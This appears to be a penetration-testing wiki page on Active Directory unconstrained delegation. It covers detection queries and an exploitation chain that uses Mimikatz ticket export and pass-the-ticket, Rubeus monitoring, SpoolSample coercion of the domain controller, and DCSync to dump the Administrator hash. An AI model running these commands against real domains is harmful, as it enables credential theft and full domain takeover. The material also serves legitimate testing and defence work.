Unconstrained delegation

Unconstrained delegation

More specifically, the domain controller places a copy of the user’s TGT into the service ticket. When the user’s service ticket (TGS) is provided to the server for service access the server opens the TGS and places the user’s TGT into the LSASS for later use allowing the server to impersonate the user. Obtaining the ticket could lead to domain escalation as the ticket might belong to the machine account of the domain controller or a high privilege account like the domain administrator. For a computer to authenticate on behalf of other services (unconstrained delegation) two conditions are required:

  1. Account has the TRUSTED_FOR_DELEGATION flag in the User Account Control (UAC) flags.

  2. User account has not the NOT_DELEGATED flag set which by default non domain accounts have this flag.

Detecting

AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

Other interesting properties that can be enumerated are the:

  • TrustedToAuthForDelegation

  • msDS-AllowedToDelegateTo

  • PrincipalsAllowedToDelegateToAccount

Get-ADComputer "Hive" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo, PrincipalsAllowedToDelegateToAccount

Powerview 3.0

Get-DomainComputer -Unconstrained

Exploiting

## We must trick or wait for a domain admin to connect a service on appsrv.
## Now, if the command is run again:
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'

## The DA token could be reused:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgtDOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Force authentication

There are multiple protocols which can coerce the machine account of the domain controller to authenticate with other hosts on the system such as spoolsample and encrypting file services remote procedure call. However, capturing the ticket of the machine account requires Rubeus to run in monitor state mode.

Rubeus.exe monitor /monitorinterval:10 /targetuser:DC$ /nowrap

Execution of the printer bug will coerce the domain controller to authenticate with the workstation which is configured for unconstrained delegation.

SpoolSample.exe dc hive

The ticket granting ticket (TGT) of the domain controller machine account will received and captured by Rubeus.

The ticket will be in base64 format and therefore cannot be used directly. However, from a PowerShell console execution of the command below will convert the ticket and write the contents to a file with the .kirbi extension.

[IO.File]::WriteAllBytes("C:\Users\pentestlab.PURPLE\Desktop\DC.kirbi", [Convert]::FromBase64String("[base64string]"))

Using the Pass the Ticket within Mimikatz the current user account will get high privilege rights on the domain controller. This can be verified by using the DCSync technique to dump the NTLM hash of the domain admin account and get command execution via pass the hash on the domain controller.

kerberos::ptt DC.kirbi
lsadump::dcsync /domain:purple.lab /user:Administrator

References

Unconstrained Delegation

PreviousKerberos DelegationNextConstrained delegation

Last updated